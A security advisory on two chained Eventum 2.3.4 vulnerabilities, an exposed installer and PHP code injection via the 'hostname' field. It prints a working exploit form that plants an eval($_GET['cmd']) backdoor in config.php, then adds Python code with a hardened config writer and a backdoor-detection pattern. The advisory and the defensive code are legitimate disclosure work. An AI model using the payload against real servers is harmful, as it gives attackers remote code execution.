High-Tech Bridge Security Advisory HTB23198

Multiple Vulnerabilities in Eventum

Published: 2014-01-22
Source: High-Tech Bridge Security Research Lab, www.htbridge.com

EPSS: 0.02 (Low), percentile 89.0%

High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Eventum, which can be chained to reinstall and fully compromise a vulnerable installation.

  1. Incorrect Default Permissions in Eventum: CVE-2014-1631
    The vulnerability exists due to an incorrect default permission set for the installation scripts. Access to the installation script located at "/setup/index.php" is not restricted by default, and the script is not deleted during the installation process. A remote attacker can access the script and reinstall the application, which also requires that the "/setup/" directory be removed or access to it denied after a legitimate installation.
    The installation script can be accessed by a remote unauthenticated user via the following URL:
    http://[host]/setup/index.php

  2. Code Injection in Eventum: CVE-2014-1632
    The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname" passed to the installation script ("/setup/index.php"), which writes the value into the "/config/config.php" script. A remote attacker can inject and execute arbitrary PHP code on the target system with the privileges of the webserver. Successful exploitation requires that the installer can reach a database, which the attacker achieves by supplying the address of an attacker-controlled MySQL server in the "db_hostname" parameter (together with a database name and credentials valid on that server); note that "drop_tables=yes" also drops the existing Eventum tables.
    The following exploitation example injects a backdoor into the "/config/config.php" file:
    <form action="http://[host]/setup/index.php" method="post" name="main">
    <input type="hidden" name="cat" value="install">
    <input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
    <input type="hidden" name="relative" value="/">
    <input type="hidden" name="db_hostname" value="db_hostname">
    <input type="hidden" name="db_name" value="db_name">
    <input type="hidden" name="db_table_prefix" value="db_table_prefix">
    <input type="hidden" name="drop_tables" value="yes">
    <input type="hidden" name="db_username" value="db_username">
    <input type="hidden" name="setup[smtp][from]" value="[email protected]">
    <input type="hidden" name="setup[smtp][host]" value="localhost">
    <input type="hidden" name="setup[smtp][port]" value="25">
    <input type="hidden" name="" value="">
    <input type="submit" id="btn">
    </form>
    After a successful reinstallation the attacker can execute arbitrary PHP code on the system through any page that includes the rewritten "/config/config.php". The following example executes the "phpinfo()" PHP function on the vulnerable system:
    http://[host]/index.php?cmd=phpinfo%28%29;
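The following added example (written for this page, not Eventum's or High-Tech Bridge's code) models both issues above. For CVE-2014-1631 it probes whether "/setup/index.php" still answers with an install form; the fetcher is injectable so the check can run offline, and the "cat=install" hidden-field heuristic is an assumption drawn from the exploit form. For CVE-2014-1632 it reproduces the write pattern the "hostname" payload implies, namely that the installer emits define('APP_HOSTNAME', '<hostname>'); by plain string concatenation (an assumption inferred from the payload shape, not verified against Eventum's source), shows why the payload breaks out of the string literal, and contrasts it with a validated and escaped write. find_backdoor() is the quick incident-response check to run over an existing config.php; the hostnames and response bodies are constructed sample data.

```python
"""Added example for HTB23198 (not Eventum's code). See the lead-in for assumptions."""
import re
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

SETUP_PATH = "/setup/index.php"
# The "hostname" value from the advisory's exploit form.
ADVISORY_PAYLOAD = "'); eval($_GET['cmd']); $tmp=('"


def default_fetch(url):
    """GET url and return (status, body); used when no fetcher is injected."""
    try:
        with urlopen(Request(url, headers={"User-Agent": "htb23198-check"}), timeout=10) as resp:
            return resp.status, resp.read(65536).decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, ""
    except URLError:
        return 0, ""


def exposed_setup_script(base_url, fetch=default_fetch):
    """CVE-2014-1631 check: True when the installer is reachable and still renders its form.

    Heuristic (assumption): the form carries the hidden cat=install field that the
    advisory's exploit form reproduces. A 200 without that field is not flagged.
    """
    status, body = fetch(base_url.rstrip("/") + SETUP_PATH)
    return status == 200 and 'name="cat"' in body and 'value="install"' in body


def render_config(hostname):
    """Vulnerable pattern (assumed): POST data concatenated into a PHP single-quoted literal."""
    return "<?php\ndefine('APP_HOSTNAME', '" + hostname + "');\n"


def php_single_quote(value):
    """Emit a PHP single-quoted literal; only backslash and the quote are special there."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


# RFC 1123 style labels with an optional :port; anything else is not a hostname.
HOSTNAME_RE = re.compile(
    r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)(?:\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*(?::\d{1,5})?$"
)


def hostname_is_valid(hostname):
    return HOSTNAME_RE.match(hostname) is not None


def render_config_safe(hostname):
    """Hardened write: reject anything that is not a hostname, then escape on output."""
    if not hostname_is_valid(hostname):
        raise ValueError("hostname rejected: %r" % hostname)
    return "<?php\ndefine('APP_HOSTNAME', " + php_single_quote(hostname) + ");\n"


PHP_SQ_LITERAL = re.compile(r"'(?:\\.|[^'\\])*'", re.S)


def code_outside_literals(php_src):
    """Blank out single-quoted literals so only executable PHP tokens remain."""
    return PHP_SQ_LITERAL.sub("''", php_src)


BACKDOOR_RE = re.compile(
    r"\b(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\("
    r"|\$_(?:GET|POST|REQUEST|COOKIE)\b"
)


def find_backdoor(config_src):
    """IR check: (line_no, line) pairs in config.php that call code no installer writes.

    The match runs on code outside string literals, so a correctly escaped value
    that merely contains the word eval( cannot trigger it.
    """
    hits = []
    for num, line in enumerate(config_src.splitlines(), 1):
        if BACKDOOR_RE.search(code_outside_literals(line)):
            hits.append((num, line))
    return hits


if __name__ == "__main__":
    unsafe = render_config(ADVISORY_PAYLOAD)
    print(unsafe)                      # the literal is closed and eval() becomes code
    print(find_backdoor(unsafe))       # [(2, "define('APP_HOSTNAME', ''); eval(...")]
    try:
        render_config_safe(ADVISORY_PAYLOAD)
    except ValueError as err:
        print(err)
    print(render_config_safe("tracker.example.com"))
```

Run the probe against your own instance as exposed_setup_script("https://eventum.example"); a True result means the installer is still reachable. After a suspected reinstall, run find_backdoor() over the contents of config/config.php and treat any hit as a compromise, since a legitimate installer never writes eval() or request superglobals into that file.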

Affected products (CPE)
  Name      Operator   Version
  eventum   le         2.3.4
(i.e. Eventum 2.3.4 and earlier)